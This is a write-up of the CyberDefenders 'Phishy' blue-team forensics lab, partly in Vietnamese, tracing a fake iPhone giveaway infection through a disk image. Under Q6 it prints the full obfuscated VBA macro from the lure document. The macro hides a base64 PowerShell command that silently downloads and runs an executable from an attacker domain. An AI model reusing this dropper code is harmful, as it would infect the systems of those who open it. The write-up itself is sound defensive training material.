[Cyberdefenders] Phishy Blue Team Lab

Phishy Blue Team Lab ==================== Category: Endpoint https://cyberdefenders.org/blueteam-ctf-challenges/phishy/#nav-questions Scenario: A company’s employee joined a fake iPhone giveaway. Our team took a disk image of the employee's system for further analysis. As a soc analyst, you are tasked to identify how the system was compromised. Tools: ------ - [FTK Imager](https://accessdata.com/products-services/forensic-toolkit-ftk/ftkimager) - [Autopsy](https://www.sleuthkit.org/autopsy/) - [Registry Explorer](https://f001.backblazeb2.com/file/EricZimmermanTools/RegistryExplorer_RECmd.zip) - [SQLite Browser](https://sqlitebrowser.org/) - [browsinghistoryview](https://www.nirsoft.net/utils/browsing_history_view.html) - [passwordfox](https://www.nirsoft.net/utils/passwordfox.html) - [Whatsapp viewer](https://github.com/andreas-mausch/whatsapp-viewer/releases/download/v1.13/WhatsApp.Viewer.zip) - [oledump](https://blog.didierstevens.com/programs/oledump-py/) - [virustotal](https://www.virustotal.com/gui/home/upload) - [HybridAnalysis](https://www.hybrid-analysis.com/) # Q1 - What is the hostname of the victim machine? ![image](https://hackmd.io/_uploads/SkSIXVHf0.png) => WIN-NF3JQEU4G0T # Q2 - What is the messaging app installed on the victim machine? Tìm file exe ![image](https://hackmd.io/_uploads/SkRfVNSGA.png) => whatsapp # Q3 - The attacker tricked the victim into downloading a malicious document. Provide the full download URL. Extract file msgstore.db ![image](https://hackmd.io/_uploads/Hy02BVBGA.png) sau đó dùng whatsapp viewer để xem ![image](https://hackmd.io/_uploads/BkharESf0.png) => http://appIe.com/IPhone-Winners.doc # Q4 - Multiple streams contain macros in the document. Provide the number of the highest stream. Đầu tiên mình extract iphone-winners.doc, nó ở mục downloads ![image](https://hackmd.io/_uploads/SyTzxLIMA.png) Sử dụng [ oledump](https://blog.didierstevens.com/programs/oledump-py/) ![image](https://hackmd.io/_uploads/r1D4g88fR.png) => 10 # Q5 - The macro executed a program. Provide the program name? `python oledump.py -v C:\Users\Admin\OneDrive\Desktop\phishy\IPhone-Winners.doc -s 10` ![image](https://hackmd.io/_uploads/SypBBLLfR.png) ![image](https://hackmd.io/_uploads/rkZbB8UzR.png) => powershell # Q6 - The macro downloaded a malicious file. Provide the full download URL. ``` Attribute VB_Name = "iphoneevil" Function lllllllll1l() Dim lllllllllll As String Dim llllllllll1 As String lllllllllll = Chr(97) & Chr(81) & Chr(66) & Chr(117) & Chr(65) & Chr(72) & Chr(89) & Chr(65) & Chr(98) & Chr(119) & Chr(66) & Chr(114) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(76) & Chr(81) & Chr(66) & Chr(51) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(89) & Chr(103) & Chr(66) & Chr(121) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(99) & Chr(81) & Chr(66) & Chr(49) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(99) & Chr(119) & Chr(66) & Chr(48) & Chr(65) & Chr(67) & Chr(65) & Chr(65) & Chr(76) & Chr(81) & _ Chr(66) & Chr(86) & Chr(65) & Chr(72) & Chr(73) & Chr(65) & Chr(97) & Chr(81) & Chr(65) & Chr(103) & Chr(65) & Chr(67) & Chr(99) & Chr(65) & Chr(97) & Chr(65) & Chr(66) & Chr(48) & Chr(65) & Chr(72) & Chr(81) & Chr(65) & Chr(99) & Chr(65) & Chr(65) & Chr(54) & Chr(65) & Chr(67) & Chr(56) & Chr(65) & Chr(76) & Chr(119) & Chr(66) & Chr(104) & Chr(65) & Chr(72) & Chr(65) & Chr(65) & Chr(99) & Chr(65) & Chr(66) & Chr(74) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(76) & Chr(103) & Chr(66) & Chr(106) & Chr(65) & Chr(71) & Chr(56) & Chr(65) & Chr(98) & Chr(81) & Chr(65) _ & Chr(118) & Chr(65) & Chr(69) & Chr(107) & Chr(65) & Chr(99) & Chr(65) & Chr(66) & Chr(111) & Chr(65) & Chr(71) & Chr(56) & Chr(65) & Chr(98) & Chr(103) & Chr(66) & Chr(108) & Chr(65) & Chr(67) & Chr(52) & Chr(65) & Chr(90) & Chr(81) & Chr(66) & Chr(52) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(74) & Chr(119) & Chr(65) & Chr(103) & Chr(65) & Chr(67) & Chr(48) & Chr(65) & Chr(84) & Chr(119) & Chr(66) & Chr(49) & Chr(65) & Chr(72) & Chr(81) & Chr(65) & Chr(82) & Chr(103) & Chr(66) & Chr(112) & Chr(65) & Chr(71) & Chr(119) & Chr(65) & Chr(90) & Chr(81) & Chr(65) & _ Chr(103) & Chr(65) & Chr(67) & Chr(99) & Chr(65) & Chr(81) & Chr(119) & Chr(65) & Chr(54) & Chr(65) & Chr(70) & Chr(119) & Chr(65) & Chr(86) & Chr(65) & Chr(66) & Chr(108) & Chr(65) & Chr(71) & Chr(48) & Chr(65) & Chr(99) & Chr(65) & Chr(66) & Chr(99) & Chr(65) & Chr(69) & Chr(107) & Chr(65) & Chr(85) & Chr(65) & Chr(66) & Chr(111) & Chr(65) & Chr(71) & Chr(56) & Chr(65) & Chr(98) & Chr(103) & Chr(66) & Chr(108) & Chr(65) & Chr(67) & Chr(52) & Chr(65) & Chr(90) & Chr(81) & Chr(66) & Chr(52) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(74) & Chr(119) & Chr(65) & _ Chr(103) & Chr(65) & Chr(67) & Chr(48) & Chr(65) & Chr(86) & Chr(81) & Chr(66) & Chr(122) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(82) & Chr(65) & Chr(66) & Chr(108) & Chr(65) & Chr(71) & Chr(89) & Chr(65) & Chr(89) & Chr(81) & Chr(66) & Chr(49) & Chr(65) & Chr(71) & Chr(119) & Chr(65) & Chr(100) & Chr(65) & Chr(66) & Chr(68) & Chr(65) & Chr(72) & Chr(73) & Chr(65) & Chr(90) & Chr(81) & Chr(66) & Chr(107) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(98) & Chr(103) & Chr(66) & Chr(48) & Chr(65) & Chr(71) & Chr(107) & Chr(65) & Chr(89) & Chr(81) & Chr(66) & Chr(115) _ & Chr(65) & Chr(72) & Chr(77) & Chr(65) llllllllll1 = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(32) & Chr(45) & Chr(69) & Chr(110) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(100) & Chr(67) & Chr(111) & Chr(109) & Chr(109) & Chr(97) & Chr(110) & Chr(100) & lllllllllll CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).Run llllllllll1, 0, True End Function ``` ![image](https://hackmd.io/_uploads/SyW8NeYzA.png) ![image](https://hackmd.io/_uploads/rJwwEeFGC.png) [cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Remove_null_bytes()&input=YVFCdUFIWUFid0JyQUdVQUxRQjNBR1VBWWdCeUFHVUFjUUIxQUdVQWN3QjBBQ0FBTFFCVkFISUFhUUFnQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0JoQUhBQWNBQkpBR1VBTGdCakFHOEFiUUF2QUVrQWNBQm9BRzhBYmdCbEFDNEFaUUI0QUdVQUp3QWdBQzBBVHdCMUFIUUFSZ0JwQUd3QVpRQWdBQ2NBUXdBNkFGd0FWQUJsQUcwQWNBQmNBRWtBVUFCb0FHOEFiZ0JsQUM0QVpRQjRBR1VBSndBZ0FDMEFWUUJ6QUdVQVJBQmxBR1lBWVFCMUFHd0FkQUJEQUhJQVpRQmtBR1VBYmdCMEFHa0FZUUJzQUhNQQ) => http://appIe.com/Iphone.exe # Q7 -Where was the malicious file downloaded to? (Provide the full path) Như câu trên => C:\Temp\IPhone.exe # Q8 - What is the name of the framework used to create the malware? ![image](https://hackmd.io/_uploads/HyWXubYzR.png) Upload lên virustotal => meterpreter trojan là 1 phần của Metasploit framework => Metasploit # Q9 - What is the attacker's IP address? upload lên HybridAnalysis, check contacted host ![image](https://hackmd.io/_uploads/ByFEi-YzR.png) => 155.94.69.27 # Q10 - The fake giveaway used a login page to collect user information. Provide the full URL of the login page? Xem file places.sqplite bằng autopsy ![image](https://hackmd.io/_uploads/H175pbFGR.png) => http://appIe.competitions.com/login.php # Q11 - What is the password the user submitted to the login page? Load folder pyb51x2n.default-release lên PasswordFox ![image](https://hackmd.io/_uploads/SyELlftzC.png) => GacsriicUZMY4xiAF4yl # References and Further Readings https://responderj01.medium.com/phishy-challenge-walkthrough-cyberdefenders-3fb1c56850a3 https://medium.com/@Ayham_Assaf/cyberdefenders-phishy-blue-team-challenge-de915d578808 https://markmckinnon-80619.medium.com/new-autopsy-modules-now-available-7c56d2032020